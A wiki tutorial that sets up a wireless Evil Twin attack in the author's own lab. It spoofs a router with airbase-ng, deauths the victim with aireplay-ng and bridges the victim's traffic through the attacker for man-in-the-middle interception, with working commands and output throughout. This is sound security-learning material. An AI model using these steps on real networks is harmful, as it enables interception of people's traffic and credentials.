Evil Twin/Setup
From charlesreid1
Contents
- 1 Setup
- 2 Procedure
- 2.1 Connect Sheep to Good Twin
- 2.2 Connect Evil Twin to Internet
- 2.3 Device Information
- 2.4 AP Information
- 2.5 Create Evil Twin (Window 1)
- 2.6 Make Evil Twin Obnoxious
- 2.7 Instrumenting the Network
- 2.8 Find Sheep on Good Twin
- 2.9 Deauth Sheep on Good Twin (Window 2)
- 2.10 Connecting Sheep to Evil Twin
- 2.11 Keeping Sheep Connected to Internet
- 2.12 Wayne's World
- 3 References
Setup
The Machines
A note on machine names.
kronos is the sheep.
mars is the attacker.
Goodies
On the attacking machine:
mars $ apt-get install bridge-utils
Procedure
Connect Sheep to Good Twin
First step is to connect the sheep to the good twin:
sheep $ iw dev wlan0 scan sheep $ wpa_supplicant -D nl80211,wext -i wlan0 -c <(wpa_passphrase "YourESSIDHere" "YourPassphraseHere")
Or alternatively, edit /etc/network/interfaces and add this:
auto wlan0
iface wlan0 inet dhcp
wpa-ssid MyRouter
wpa-psk MyPassword
Connect Evil Twin to Internet
Okay, before we get started we have to explain a bit about the Evil Twin and its network interfaces.
The Evil Twin is recommended to have a minimum of ONE wifi device and ONE ethernet device. This makes it possible to create a bridge between the two network devices. Ethernet ensures that the man in the middle won't be too much of a bottleneck.
Now let's connect the Evil Twin to the internet using a physical network cable. This is the connection that the Sheep's internet traffic, once it has been parsed, will pass through on its way to the internet.
Device Information
Get info about your devices:
mars $ iwconfig
AP Information
Get info about the Good Twin AP:
mars $ airodump-ng wlan0
Create Evil Twin (Window 1)
To create our Evil Twin AP, we'll use airbase:
mars $ airbase-ng -a <BSSID> --essid <ESSID> -c <channel> <interface>
or, to make it shorter,
mars $ airbase-ng --essid <ESSID of network> <interface>
So for example, we might listen for the Good Twin router on channel 11, see it, then create our base station:
mars $ airbase-ng -a AA:BB:CC:DD:EE:FF --essid "HomeRouter" -c 10 wlan1 21:39:29 Created tap interface at0 21:39:29 Trying to set MTU on at0 to 1500 21:39:29 Trying to set MTU on wlan1 to 1800 21:39:29 Access Point with BSSID AA:BB:CC:DD:EE:FF started.
Make Evil Twin Obnoxious
Instrumenting the Network
No experiment in security would be any good if we weren't watching what was going on with the internals of the network!
I put a second wireless card on the sheep, and before the whole attack went down, I fired up wireshark and started a packet dump on the network to watch what was happening.
Find Sheep on Good Twin
Next we'll need to monitor the wireless channel to find our sheep connected to the Good Twin access point.
Run airodump-ng against the Good Twin using its MAC address:
mars $ airodump-ng -d AA:BB:CC:DD:EE wlan0
This will listen for traffic destined to or from the Good Twin router, and you should see your client and your client's MAC address listed at the bottom of that screen.
Deauth Sheep on Good Twin (Window 2)
Now that you have the sheep's MAC address, you can deauth them from the Good Twin network. When they look for the beacon for their wireless network again, it will actually be the Evil Twin.
Make sure your airbase is running.
Kick the Sheep off of the Good Twin router using aireplay's deauth attack:
mars $ aireplay-ng -0 1 -a <Good Twin AP MAC Address> -c <Sheep MAC Address> wlan0
Once the sheep has been kicked off, it will begin to look for the Good Twin again. But the Evil Twin will be there instead.
From the sheep, I immediately saw an authentication dialogue pop up, with my password remembered and pre-populated. It's really easy for the Sheep to just say, Okay, try again to connect.
Connecting Sheep to Evil Twin
The Sheep will begin to look for the Good Twin, will see the Evil Twin, and will connect to it.
In your airbase window, this should look something like this:
$ airbase-ng -a AA:BB:CC:DD:EE --essid "Walrus" -c 6 wlan5 14:50:56 Created tap interface at0 14:50:56 Trying to set MTU on at0 to 1500 14:50:56 Trying to set MTU on wlan5 to 1800 14:50:56 Access Point with BSSID AA:BB:CC:DD:EE started. 14:58:55 Client 7C:DD:90 associated (WPA2;CCMP) to ESSID: "Walrus" 15:03:24 Client 7C:DD:90 associated (WPA2;CCMP) to ESSID: "Walrus"
Keeping Sheep Connected to Internet
Keep the sheep surfin the web, by creating a bridge.
Remember we created an evil twin access point with airbase-ng on wlan1, and the sheep has been kicked off the Good Twin and is now on the evil twin.
But we need to provide a bridge back to the Good Twin, so that we can continue to keep the Sheep's internet connection alive and going through the Evil Twin.
Bridging Devices
On mars, the attack machine, where you ran airbase-ng, you will have an new interface created by airbase-ng that is called at0. If at0 is bridged to a working internet connection, then voila, your client has a "wireless" connection through "their" router.
Our evil twin is on wlan1, our sheep's network connection is on at0, and our second wireless card or ethernet port with an internet connection is on eth0.
We'll build a bridge to connect an internet-enabled network interface (eth0) to the sheep's network connection (at0).
Note that at0 and eth0 DO NOT need to be the same router that's being spoofed. That means, you can spoof router A, and bridge a connection from the evil twin of router A to a different internet connection at router B. (And if that connection on router B is faster, the Sheep will probably prefer that you Man-In-The-Middle them!)
Building the Bridge
First, we'll add our bridge, call it lucifer:
mars $ brctl addbr lucifer
Now add the two interfaces we're bridging, eth0 and at0 (WARNING: if you are connected to the attacking machine via SSH, this may disconnect you from the machine!):
mars $ brctl addif lucifer at0 mars $ brctl addif lucifer eth0
Now assign IP address to the interfaces and bring them up using ifconfig:
mars $ ifconfig eth0 0.0.0.0 up mars $ ifconfig at0 0.0.0.0 up
Now rasise the bridge that you've constructed:
mars $ ifconfig lucifer up
Autoconfigure the DHCP settings with dhclient
mars $ dhclient lucifer
Check with Syslog
You can also run tail -f /var/log/syslog in another window to watch and make sure the process is going as expected:
Aug 24 15:16:28 kronos dhclient: DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 4 Aug 24 15:16:29 kronos kernel: [ 3917.454956] tg3 0000:03:00.0 eth0: Link is up at 1000 Mbps, full duplex Aug 24 15:16:29 kronos kernel: [ 3917.454968] tg3 0000:03:00.0 eth0: Flow control is on for TX and on for RX Aug 24 15:16:29 kronos kernel: [ 3917.455122] IPv6: ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready Aug 24 15:16:29 kronos kernel: [ 3917.455237] lucifer: port 2(eth0) entered forwarding state Aug 24 15:16:29 kronos kernel: [ 3917.455266] lucifer: port 2(eth0) entered forwarding state Aug 24 15:16:29 kronos NetworkManager[715]: <info> (eth0): link connected Aug 24 15:16:30 kronos avahi-daemon[1124]: Joining mDNS multicast group on interface eth0.IPv6 with address fe80::cabc:c8ff:fe9f:a6c1. Aug 24 15:16:30 kronos avahi-daemon[1124]: New relevant interface eth0.IPv6 for mDNS. Aug 24 15:16:30 kronos avahi-daemon[1124]: Registering new address record for fe80::cabc:c8ff:fe9f:a6c1 on eth0.*. Aug 24 15:16:32 kronos dhclient: DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 11 Aug 24 15:16:32 kronos dhclient: DHCPREQUEST on eth0 to 255.255.255.255 port 67 Aug 24 15:16:32 kronos dhclient: DHCPOFFER from 10.0.0.1 Aug 24 15:16:32 kronos dhclient: DHCPACK from 10.0.0.1 Aug 24 15:16:32 kronos smbd[5499]: Reloading /etc/samba/smb.conf: smbd. Aug 24 15:16:32 kronos avahi-daemon[1124]: Joining mDNS multicast group on interface eth0.IPv4 with address 10.0.0.19. Aug 24 15:16:32 kronos avahi-daemon[1124]: New relevant interface eth0.IPv4 for mDNS. Aug 24 15:16:32 kronos avahi-daemon[1124]: Registering new address record for 10.0.0.19 on eth0.IPv4. Aug 24 15:16:32 kronos dhclient: bound to 10.0.0.19 -- renewal in 2147483648 seconds. Aug 24 15:16:35 kronos dhclient: DHCPDISCOVER on lucifer to 255.255.255.255 port 67 interval 4 Aug 24 15:16:36 kronos dhclient: DHCPREQUEST on lucifer to 255.255.255.255 port 67 Aug 24 15:16:36 kronos dhclient: DHCPOFFER from 10.0.0.1 Aug 24 15:16:36 kronos dhclient: DHCPACK from 10.0.0.1 Aug 24 15:16:36 kronos smbd[5692]: Reloading /etc/samba/smb.conf: smbd. Aug 24 15:16:36 kronos dhclient: bound to 10.0.0.194 -- renewal in 2147483648 seconds. Aug 24 15:16:44 kronos kernel: [ 3932.508123] lucifer: port 2(eth0) entered forwarding state
Look at the Bridge
You can take a look a the resulting network interfaces with ifconfig:
ifconfig
at0 Link encap:Ethernet HWaddr 74:85:2a
inet6 addr: fe80::7685:2aff:5b08/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:4 errors:0 dropped:0 overruns:0 frame:0
TX packets:349 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:500
RX bytes:540 (540.0 B) TX bytes:54845 (53.5 KiB)
eth0 Link encap:Ethernet HWaddr c8:bc:c8
inet addr:10.0.0.19 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: fe80::cabc:a6c1/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:640 errors:0 dropped:0 overruns:0 frame:0
TX packets:529 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:457344 (446.6 KiB) TX bytes:94347 (92.1 KiB)
Interrupt:17
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:62 errors:0 dropped:0 overruns:0 frame:0
TX packets:62 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:3856 (3.7 KiB) TX bytes:3856 (3.7 KiB)
lucifer Link encap:Ethernet HWaddr 74:85:2a
inet addr:10.0.0.194 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: fe80:::fe97:5b08/64 Scope:Link
inet6 addr: 2601:d335:7685:2aff:fe97:5b08/64 Scope:Global
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:859 errors:0 dropped:0 overruns:0 frame:0
TX packets:684 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:492405 (480.8 KiB) TX bytes:130130 (127.0 KiB)
Wayne's World
Aright, we've got the Sheep to successfully connect to hte Evil Twin AP. Now what?
Now the stage is set for a man-in-the-middle attack.
See Man in the Middle/Evil Twin page for more deets.
References
http://blog.erratasec.com/2007/08/sidejacking-with-hamster_05.html#.VdlxmNeZeRs
http://www.security.securethelock.com/configuring-dhcp3-man-middle-attacks/
https://github.com/P0cL4bs/3vilTwinAttacker
http://www.m0rd0r.eu/how-to-make-transparent-bridge-with-slackware-linux/
 |
Evil Twin Attack A wireless attack that sets up a fake AP, allowing a Man in the Middle attack to occur.
Evil Twin · Category:Evil Twin Setting up the attack: Evil Twin/Setup Executing the attack: Man in the Middle/Evil Twin More: Man in the Middle/Evil Twin with Ettercap
Category:Security · Category:Wireless · Category:Passwords
|
|
monkey in the middle attacks in which an attacker tricks two parties into thinking they're communicating with each other, but both are communicating with the attacker.
Wireless Attacks: MITM/Wireless Wired Attacks: MITM/Wired
Layer 1 and 2 MITM Attacks: Network Tap: MITM/Wired/Network Tap Evil Twin Attack: Evil Twin · MITM/Evil Twin
Layer 3 and 4 MITM Attacks:
ARP Poisoning: MITM/ARP Poisoning Traffic Injection/Modification: MITM/Traffic Injection DNS Attacks: MITM/DNS · Bettercap/Failed DNS Spoofing Attack · Bettercap/Failed DNS Spoofing Attack 2 DHCP Attacks: MITM/DHCP WPAD MITM Attack: MITM/WPAD Port Stealing: MITM/Port Stealing Rushing Attack: MITM/Rushing Attack Attacking HTTPS: MITM/HTTPS
Session Hijacking: MITM/Session Hijacking
Toolz:
SSLSniff · SSLStrip · Frankencert
MITM Labs: {{MITMLabs}}
Category:MITM · Category:Attacks · Category:Kali Attack Layers Template:MITMLabs · Template:MITMFlag Flags · Template:MITMFlag · e |